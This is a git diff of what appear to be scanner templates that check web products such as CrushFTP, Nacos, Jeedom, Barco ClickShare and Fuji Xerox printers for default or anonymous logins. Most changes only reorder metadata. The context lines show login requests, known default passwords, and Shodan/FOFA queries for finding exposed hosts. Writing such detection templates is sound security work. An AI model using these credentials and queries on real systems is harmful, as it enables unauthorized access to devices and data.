1dd8e0682a..552535cf89 100644 --- a/http/default-logins/barco-clickshare-default-login.yaml +++ b/http/default-logins/barco-clickshare-default-login.yaml @@ -6,28 +6,26 @@ info: severity: high description: | Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found. - metadata: - max-request: 3 - shodan-query: "ClickShareSession" - product: clickshare_cs-100_huddle_firmware - vendor: barco - tags: default-login,barco,clickshare - classification: cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: barco + product: clickshare_cs-100_huddle_firmware + shodan-query: "ClickShareSession" + tags: default-login,barco,clickshare + http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} - - | POST /login/log_me_in HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true - - | GET /configuration_wizard HTTP/1.1 Host: {{Hostname}} @@ -38,7 +36,6 @@ http: - admin password: - admin - matchers: - type: dsl dsl: @@ -55,4 +52,5 @@ http: regex: - '="csrf_protection_token" value="([0-9a-z]+)" \/>' internal: true -# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml index e75cb3895d..5d7bd05258 100644 --- a/http/default-logins/batflat/batflat-default-login.yaml +++ b/http/default-logins/batflat/batflat-default-login.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.exploitalert.com/view-details.html?id=34749 - https://cxsecurity.com/issue/WLB-2020010100 + classification: + cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: intext:"Powered by Batflat." - product: batflat vendor: batflat + product: batflat + google-query: intext:"Powered by Batflat." tags: default-login,batflat - classification: - cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +43,4 @@ http: - 'contains(body, "Batflat - Dashboard")' condition: and -# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml index a3c64eb5e4..46fe695806 100644 --- a/http/default-logins/bloofoxcms-default-login.yaml +++ b/http/default-logins/bloofoxcms-default-login.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.bloofox.com/automated_setup.113.html - https://www.bloofox.com + classification: + cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 - fofa-query: "Powered by bloofoxCMS" - product: bloofoxcms vendor: bloofox + product: bloofoxcms + fofa-query: "Powered by bloofoxCMS" tags: bloofox,cms,default-login - classification: - cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +43,4 @@ http: - status_code == 200 condition: and -# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index 312db35221..3b81c497d4 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -6,23 +6,21 @@ info: severity: high description: | CrushFTP Anonymous login credentials were discovered. + classification: + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"CrushFTP" - product: crushftp vendor: crushftp + product: crushftp + shodan-query: html:"CrushFTP" tags: default-logins,anonymous,crushftp,default-login - classification: - cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* http: - raw: - | GET /WebInterface/ HTTP/1.1 Host: {{Hostname}} - - - | POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} @@ -42,7 +40,6 @@ http: words: - "text/xml" - extractors: - type: regex name: auth @@ -51,4 +48,5 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index fcc1e77dd2..af5bd36938 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -6,23 +6,21 @@ info: severity: high description: | CrushFTP default login credentials were discovered. + classification: + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"CrushFTP" - product: crushftp vendor: crushftp + product: crushftp + shodan-query: html:"CrushFTP" tags: default-login,crushftp - classification: - cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* http: - raw: - | GET /WebInterface/ HTTP/1.1 Host: {{Hostname}} - - - | POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} @@ -31,15 +29,14 @@ http: command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926 - attack: pitchfork payloads: username: - crushadmin password: - crushadmin - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -60,4 +57,5 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/dataease/dataease-default-login.yaml b/http/default-logins/dataease/dataease-default-login.yaml index ae9aa86f9d..d1a4b82f91 100644 --- a/http/default-logins/dataease/dataease-default-login.yaml +++ b/http/default-logins/dataease/dataease-default-login.yaml @@ -9,16 +9,16 @@ info: As a result, many Dataease can log in with this built-in account. reference: - https://github.com/dataease/dataease/issues/5995 + classification: + cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Dataease" - product: dataease vendor: dataease_project + product: dataease + shodan-query: html:"Dataease" tags: default-login,dataease - classification: - cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:* http: - method: POST path: @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml index 3078ced72b..f8da38a772 100644 --- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml +++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html + classification: + cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 - product: elasticsearch vendor: elastic + product: elasticsearch + shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 tags: default-login,elasticsearch - classification: - cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* http: - raw: - | @@ -54,4 +54,4 @@ http: status: - 200 -# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index f4078822de..e6876b9e96 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Esafenet electronic document security management system default credentials were discovered. + classification: + cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* metadata: verified: true max-request: 32 - fofa-query: esafenet - product: cdg vendor: esafenet + product: cdg + fofa-query: esafenet tags: esafenet,cdg,default-login - classification: - cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:* http: - method: POST path: @@ -57,4 +57,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml index 9a7dc5ea1c..0b936db90a 100644 --- a/http/default-logins/eurotel/etl3100-default-login.yaml +++ b/http/default-logins/eurotel/etl3100-default-login.yaml @@ -9,17 +9,17 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php - https://www.exploit-db.com/exploits/51684 + classification: + cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: eurotel + product: etl3100 shodan-query: html:"ETL3100" fofa-query: body="ETL3100" - product: etl3100 - vendor: eurotel tags: misconfig,default-login,eurotel - classification: - cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:* http: - raw: - | @@ -46,4 +46,4 @@ http: - 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")' condition: and -# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml index 5739fee285..5e3b829a5c 100644 --- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml +++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml @@ -8,16 +8,16 @@ info: Attackers can log in through admin:admin, check the system status, and configure the device. reference: - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py + classification: + cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="飞鱼星企业级智能上网行为管理系统" - product: vec40g vendor: feiyuxing + product: vec40g + fofa-query: title="飞鱼星企业级智能上网行为管理系统" tags: feiyuxing,default-login,iot - classification: - cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:* http: - raw: - | @@ -52,4 +52,4 @@ http: status: - 200 -# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml index f8f8f56fb4..41cada3fba 100644 --- a/http/default-logins/franklin-fueling-default-login.yaml +++ b/http/default-logins/franklin-fueling-default-login.yaml @@ -8,16 +8,16 @@ info: A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable. reference: - https://www.exploitalert.com/view-details.html?id=39466 + classification: + cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: inurl:"relay_status.html" - product: ts-550_evo_firmware vendor: franklinfueling + product: ts-550_evo_firmware + google-query: inurl:"relay_status.html" tags: default-login,franklin - classification: - cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:* http: - raw: - | @@ -44,4 +44,4 @@ http: - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")' condition: and -# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml index 3465fe08b1..0337bbbe6d 100644 --- a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml +++ b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml @@ -8,16 +8,16 @@ info: This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2. reference: - https://4it.com.au/kb/article/fuji-xerox-default-password/ - metadata: - max-request: 1 - verified: true - vendor: fujixerox - fofa-query: '"prop.htm" && "docucentre"' - product: apeosport-v_c3375 - tags: default-login,fuji,fuji-xerox,printer - classification: cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: fujixerox + product: apeosport-v_c3375 + fofa-query: '"prop.htm" && "docucentre"' + tags: default-login,fuji,fuji-xerox,printer + http: - raw: - | @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/gitblit/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml index e12c786dd2..616391aa98 100644 --- a/http/default-logins/gitblit/gitblit-default-login.yaml +++ b/http/default-logins/gitblit/gitblit-default-login.yaml @@ -8,16 +8,16 @@ info: Gitblit Default login credentials were discovered. reference: - https://www.gitblit.com/administration.html - metadata: - max-request: 1 - verified: true - shodan-query: title:"Gitblit" - product: gitblit - vendor: gitblit - tags: gitblit,default-login - classification: cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gitblit + product: gitblit + shodan-query: title:"Gitblit" + tags: gitblit,default-login + http: - raw: - | @@ -50,4 +50,5 @@ http: - type: dsl dsl: - "len(body) == 0" -# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml index 8e5f4046e8..6021ad3cb8 100644 --- a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml +++ b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. - metadata: - shodan-query: title:"ISPConfig" http.favicon.hash:483383992 - verified: true - max-request: 1 - product: ispconfig - vendor: ispconfig - tags: ispconfig,hsp,default-login - classification: cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ispconfig + product: ispconfig + shodan-query: title:"ISPConfig" http.favicon.hash:483383992 + tags: ispconfig,hsp,default-login + http: - raw: - | @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/jeedom/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml index cb03134d89..9761315c5a 100644 --- a/http/default-logins/jeedom/jeedom-default-login.yaml +++ b/http/default-logins/jeedom/jeedom-default-login.yaml @@ -6,16 +6,15 @@ info: severity: high description: | Jeedom default login has been detected. + classification: + cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"Jeedom" - product: jeedom vendor: jeedom + product: jeedom + shodan-query: title:"Jeedom" tags: jeedom,default-login,misconfig - - classification: - cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* variables: username: admin password: admin @@ -28,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=login&username={{username}}&password={{password}}&twoFactorCode=&storeConnection=0 - - | GET /index.php?v=d&p=dashboard HTTP/1.1 Host: {{Hostname}} @@ -48,4 +46,5 @@ http: - "logout=1" - "Plugins" condition: and -# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index b444f7412f..99bf90e6a1 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -6,16 +6,16 @@ info: severity: medium description: | mantisbt Anonymous login were discovered. + classification: + cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:662709064 - product: mantisbt vendor: mantisbt + product: mantisbt + shodan-query: http.favicon.hash:662709064 tags: default-logins,anonymous,mantisbt,default-login - classification: - cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml index 7f27fe7bba..8fe5268d86 100644 --- a/http/default-logins/nacos/nacos-default-login.yaml +++ b/http/default-logins/nacos/nacos-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | The default username and password for Nacos are both nacos. + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: title=="Nacos" - product: nacos vendor: alibaba + product: nacos + fofa-query: title=="Nacos" tags: nacos,default-login,alibaba - classification: - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - raw: - | @@ -59,4 +59,4 @@ http: status: - 200 -# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index 1e22eb91c0..e1df4abf20 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Netflow Analyzer default login was discovered. + classification: + cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Login - Netflow Analyzer" - product: manageengine_netflow_analyzer vendor: zohocorp + product: manageengine_netflow_analyzer + shodan-query: html:"Login - Netflow Analyzer" tags: default-login,netflow,misconfig - classification: - cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:* http: - raw: - | @@ -45,4 +45,5 @@ http: part: location words: - "/netflow;jsessionid" -# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/node-red/nodered-default-login.yaml b/http/default-logins/node-red/nodered-default-login.yaml index 311ca4e23a..c534b98a8e 100644 --- a/http/default-logins/node-red/nodered-default-login.yaml +++ b/http/default-logins/node-red/nodered-default-login.yaml @@ -8,16 +8,16 @@ info: Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials. reference: - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ + classification: + cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:321591353 - product: node-red vendor: nodered + product: node-red + shodan-query: http.favicon.hash:321591353 tags: default-login,node-red,dashboard - classification: - cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:* http: - raw: - | @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml index e77e4a9b86..4f53d66729 100755 --- a/http/default-logins/o2oa/o2oa-default-login.yaml +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -6,16 +6,16 @@ info: severity: high description: | O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises. + classification: + cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title=="O2OA" - product: o2oa vendor: zoneland + product: o2oa + shodan-query: title=="O2OA" tags: o2oa,default-login - classification: - cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:* http: - raw: - | @@ -53,4 +53,4 @@ http: status: - 200 -# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml index 8692146699..29bb14f148 100755 --- a/http/default-logins/others/aruba-instant-default-login.yaml +++ b/http/default-logins/others/aruba-instant-default-login.yaml @@ -8,16 +8,16 @@ info: Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions. reference: - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. + classification: + cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - product: aruba_instant vendor: arubanetworks + product: aruba_instant + fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" tags: aruba,default-login - classification: - cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:* http: - raw: - | @@ -41,4 +41,4 @@ http: - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' condition: and -# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950 +# digest: 